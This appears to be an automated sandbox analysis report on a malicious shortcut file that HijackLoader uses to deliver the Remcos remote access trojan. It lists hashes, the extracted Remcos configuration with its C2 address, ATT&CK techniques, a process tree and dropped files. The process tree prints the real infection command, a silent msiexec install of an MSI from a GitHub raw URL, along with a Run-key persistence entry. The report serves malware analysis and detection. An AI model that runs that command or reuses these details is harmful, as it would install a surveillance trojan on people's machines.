hijackloader | 420a17938095a53a781bf0f48a8ba394c16a974a076794fc65cb78c0a89a563f

Analysis

max time kernel
148s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250217-en
resource tags

arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
submitted
18-02-2025 14:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ThePredictor7.3.8Launcher.tmp.lnk
Size

1KB
MD5

63b4ae48bfc52db08f3ad1008acff185
SHA1

a2affc5d7b5211f97142c0def7ad9c430119e0b2
SHA256

420a17938095a53a781bf0f48a8ba394c16a974a076794fc65cb78c0a89a563f
SHA512

0c9fafdc316375aa4fd046a3ce485346c179d85092971707b1c61e57022a15e350a06f7f27faa3c9c110540f4161ed20b274f35b5cd4579df8d98f8387e85b4b

Score

10^/10

hijackloader remcos v2 discovery loader persistence rat

Malware Config

Extracted

Family

remcos

Botnet

185.157.162.126:1995

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
qsdazeazd-EL00KX
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Detects HijackLoader (aka IDAT Loader) 1 IoCs

resource	yara_rule
behavioral2/files/0x000d000000023bdc-37.dat	family_hijackloader

HijackLoader
HijackLoader is a multistage loader first seen in 2023.
loader hijackloader
Hijackloader family
hijackloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2420	EHttpSrv.exe

Loads dropped DLL 3 IoCs

pid	Process
2420	EHttpSrv.exe
2420	EHttpSrv.exe
3532	EHttpSrv.exe

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
4972	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\EHttpSrv = "\"C:\\Users\\Admin\\AppData\\Roaming\\IXXinstall\\EHttpSrv.exe\""	msiexec.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	1388	msiexec.exe
4	1388	msiexec.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
3	raw.githubusercontent.com
4	raw.githubusercontent.com

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2420 set thread context of 3756	2420	EHttpSrv.exe	91
PID 3756 set thread context of 3532	3756	cmd.exe	94

Drops file in Windows directory 6 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE773.tmp	msiexec.exe
File created	C:\Windows\Installer\e57e717.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIE436.tmp	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EHttpSrv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EHttpSrv.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1388	msiexec.exe
1388	msiexec.exe
2420	EHttpSrv.exe
3756	cmd.exe
3756	cmd.exe

Suspicious behavior: MapViewOfSection 3 IoCs

pid	Process
2420	EHttpSrv.exe
3756	cmd.exe
3756	cmd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4972	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4972	msiexec.exe
Token: SeSecurityPrivilege	1388	msiexec.exe
Token: SeCreateTokenPrivilege	4972	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	4972	msiexec.exe
Token: SeLockMemoryPrivilege	4972	msiexec.exe
Token: SeIncreaseQuotaPrivilege	4972	msiexec.exe
Token: SeMachineAccountPrivilege	4972	msiexec.exe
Token: SeTcbPrivilege	4972	msiexec.exe
Token: SeSecurityPrivilege	4972	msiexec.exe
Token: SeTakeOwnershipPrivilege	4972	msiexec.exe
Token: SeLoadDriverPrivilege	4972	msiexec.exe
Token: SeSystemProfilePrivilege	4972	msiexec.exe
Token: SeSystemtimePrivilege	4972	msiexec.exe
Token: SeProfSingleProcessPrivilege	4972	msiexec.exe
Token: SeIncBasePriorityPrivilege	4972	msiexec.exe
Token: SeCreatePagefilePrivilege	4972	msiexec.exe
Token: SeCreatePermanentPrivilege	4972	msiexec.exe
Token: SeBackupPrivilege	4972	msiexec.exe
Token: SeRestorePrivilege	4972	msiexec.exe
Token: SeShutdownPrivilege	4972	msiexec.exe
Token: SeDebugPrivilege	4972	msiexec.exe
Token: SeAuditPrivilege	4972	msiexec.exe
Token: SeSystemEnvironmentPrivilege	4972	msiexec.exe
Token: SeChangeNotifyPrivilege	4972	msiexec.exe
Token: SeRemoteShutdownPrivilege	4972	msiexec.exe
Token: SeUndockPrivilege	4972	msiexec.exe
Token: SeSyncAgentPrivilege	4972	msiexec.exe
Token: SeEnableDelegationPrivilege	4972	msiexec.exe
Token: SeManageVolumePrivilege	4972	msiexec.exe
Token: SeImpersonatePrivilege	4972	msiexec.exe
Token: SeCreateGlobalPrivilege	4972	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe
Token: SeRestorePrivilege	1388	msiexec.exe
Token: SeTakeOwnershipPrivilege	1388	msiexec.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 3272 wrote to memory of 4504	3272	cmd.exe	86
PID 3272 wrote to memory of 4504	3272	cmd.exe	86
PID 4504 wrote to memory of 4972	4504	cmd.exe	87
PID 4504 wrote to memory of 4972	4504	cmd.exe	87
PID 1388 wrote to memory of 2420	1388	msiexec.exe	90
PID 1388 wrote to memory of 2420	1388	msiexec.exe	90
PID 1388 wrote to memory of 2420	1388	msiexec.exe	90
PID 2420 wrote to memory of 3756	2420	EHttpSrv.exe	91
PID 2420 wrote to memory of 3756	2420	EHttpSrv.exe	91
PID 2420 wrote to memory of 3756	2420	EHttpSrv.exe	91
PID 2420 wrote to memory of 3756	2420	EHttpSrv.exe	91
PID 3756 wrote to memory of 3532	3756	cmd.exe	94
PID 3756 wrote to memory of 3532	3756	cmd.exe	94
PID 3756 wrote to memory of 3532	3756	cmd.exe	94
PID 3756 wrote to memory of 3532	3756	cmd.exe	94
PID 3756 wrote to memory of 3532	3756	cmd.exe	94

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\ThePredictor7.3.8Launcher.tmp.lnk
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3272
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c #Verification660703 & msiexec /i https://github.com/leinchchanceleinch/jik/raw/refs/heads/main/d.msi /qn
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4504
- - C:\Windows\system32\msiexec.exe
    msiexec /i https://github.com/leinchchanceleinch/jik/raw/refs/heads/main/d.msi /qn
    3⤵
    - Use of msiexec (install) with remote resource
    - Suspicious use of AdjustPrivilegeToken
    PID:4972

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Adds Run key to start application
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1388
- C:\Users\Admin\AppData\Roaming\IXXinstall\EHttpSrv.exe
  "C:\Users\Admin\AppData\Roaming\IXXinstall\EHttpSrv.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2420
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\SysWOW64\cmd.exe
    3⤵
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:3756
  - - C:\Users\Admin\AppData\Roaming\IXXinstall\EHttpSrv.exe
      C:\Users\Admin\AppData\Roaming\IXXinstall\EHttpSrv.exe
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:3532

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e57e716.rbs

Filesize
10KB

MD5
b5823d8709a3126eca63c0f81941ab70

SHA1
17e842ffa791a5d0a5a260b56b574593077e7133

SHA256
3c1d128c79deef9d894630994f10c71b63dbc3f09feb947c502998b6326023b4

SHA512
f83c193412fe352553760277e6d9df1cf44bbe3dcccc4bcf8821a6692fb36f01a047d5df7ce1b8ca9b3c3955a4ad25ca77e0ab643cdb87c8b5ab328785386aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\97049e43

Filesize
1.0MB

MD5
76214ea196b023334c5c2c9129c5c087

SHA1
350cf1c35343982da8ea4092eb7360dc2add97ce

SHA256
ee6a0f4cff8951e28c540c2c64169aa97234f135df76dab1873725282cbb2003

SHA512
41b51cbed0739c8949ba56bcca04cea259386941ffad88eefa1c87f1074f701a5914737f3918a4f413951104aa2730f7fd9fe391322ab9836dfc403ed7d1efda

Download Submit
C:\Users\Admin\AppData\Roaming\IXXinstall\EHttpSrv.exe

Filesize
20KB

MD5
9329ba45c8b97485926a171e34c2abb8

SHA1
20118bc0432b4e8b3660a4b038b20ca28f721e5c

SHA256
effa6fcb8759375b4089ccf61202a5c63243f4102872e64e3eb0a1bdc2727659

SHA512
0af06b5495142ba0632a46be0778a7bd3d507e9848b3159436aa504536919abbcacd8b740ef4b591296e86604b49e0642fee2c273a45e44b41a80f91a1d52acc

Download Submit
C:\Users\Admin\AppData\Roaming\IXXinstall\MFC80U.DLL

Filesize
1.0MB

MD5
686b224b4987c22b153fbb545fee9657

SHA1
684ee9f018fbb0bbf6ffa590f3782ba49d5d096c

SHA256
a2ac851f35066c2f13a7452b7a9a3fee05bfb42907ae77a6b85b212a2227fc36

SHA512
44d65db91ceea351d2b6217eaa27358dbc2ed27c9a83d226b59aecb336a9252b60aec5ce5e646706a2af5631d5ee0f721231ec751e97e47bbbc32d5f40908875

Download Submit
C:\Users\Admin\AppData\Roaming\IXXinstall\audiogram.tif

Filesize
877KB

MD5
5124236fd955464317fbb1f344a1d2f2

SHA1
fe3a91e252f1dc3c3b4980ade7157369ea6f5097

SHA256
ed1389002cdf96c9b54de35b6e972166ee3296d628943fd594a383e674c5cba6

SHA512
2b2ac23244b16f936ef9a4049586f58c809fcc4391a56390cc5db2e8d96140001e0b977680ed1d8b0ab9c410e865a880209e22add8d42e563dc40bc91236b252

Download Submit
C:\Users\Admin\AppData\Roaming\IXXinstall\http_dll.dll

Filesize
1.9MB

MD5
fe47e255c704b20cb20c8ed93ec94d47

SHA1
ed7d26624b3cfaa72cf7d3bc59d26845fb84247a

SHA256
b0d665cb466e10ef90e1d79a39cb655ebe785d0cefc074f7a22d04936b681879

SHA512
55813a4b755773f98991b47294fed03b23d5bee9af3ef98727b7345882fe0d9976546f46847fbc30119e7c62ce7ee8ae21f54065922041cf8d42364e607bc1c0

Download Submit
C:\Windows\Installer\MSIE436.tmp

Filesize
2.9MB

MD5
ae5b94abf028388af1454ed76806cc6f

SHA1
ef013c7eec6fc6c14ccd414b5eb87abf1476566a

SHA256
f286d2b89eaebb2e1e6e23a44bc92dae7c058348286810549f4c7514c9ea61ad

SHA512
b88c3c160b68b0bdc03780a6848001aef7baa5532b815071eb4f26ff1caa87f71b2401b0c507db5389d14517310bae758aaa17f6fe7aa508f2de38cdbcac1fe2

Download Submit
memory/2420-38-0x0000000075350000-0x00000000754CB000-memory.dmp

Filesize
1.5MB

Download
memory/2420-39-0x0000000075350000-0x00000000754CB000-memory.dmp

Filesize
1.5MB

Download
memory/3532-48-0x00007FF9DB0B0000-0x00007FF9DB2A5000-memory.dmp

Filesize
2.0MB

Download
memory/3532-55-0x0000000000410000-0x0000000000494000-memory.dmp

Filesize
528KB

Download
memory/3532-46-0x0000000073850000-0x0000000074AA4000-memory.dmp

Filesize
18.3MB

Download
memory/3532-63-0x0000000000410000-0x0000000000494000-memory.dmp

Filesize
528KB

Download
memory/3532-49-0x0000000000410000-0x0000000000494000-memory.dmp

Filesize
528KB

Download
memory/3532-52-0x0000000000410000-0x0000000000494000-memory.dmp

Filesize
528KB

Download
memory/3532-53-0x0000000000410000-0x0000000000494000-memory.dmp

Filesize
528KB

Download
memory/3532-62-0x0000000000410000-0x0000000000494000-memory.dmp

Filesize
528KB

Download
memory/3532-56-0x0000000000410000-0x0000000000494000-memory.dmp

Filesize
528KB

Download
memory/3532-57-0x0000000000410000-0x0000000000494000-memory.dmp

Filesize
528KB

Download
memory/3532-58-0x0000000000410000-0x0000000000494000-memory.dmp

Filesize
528KB

Download
memory/3532-59-0x0000000000410000-0x0000000000494000-memory.dmp

Filesize
528KB

Download
memory/3532-60-0x0000000000410000-0x0000000000494000-memory.dmp

Filesize
528KB

Download
memory/3532-61-0x0000000000410000-0x0000000000494000-memory.dmp

Filesize
528KB

Download
memory/3756-44-0x0000000075350000-0x00000000754CB000-memory.dmp

Filesize
1.5MB

Download
memory/3756-42-0x00007FF9DB0B0000-0x00007FF9DB2A5000-memory.dmp

Filesize
2.0MB

Download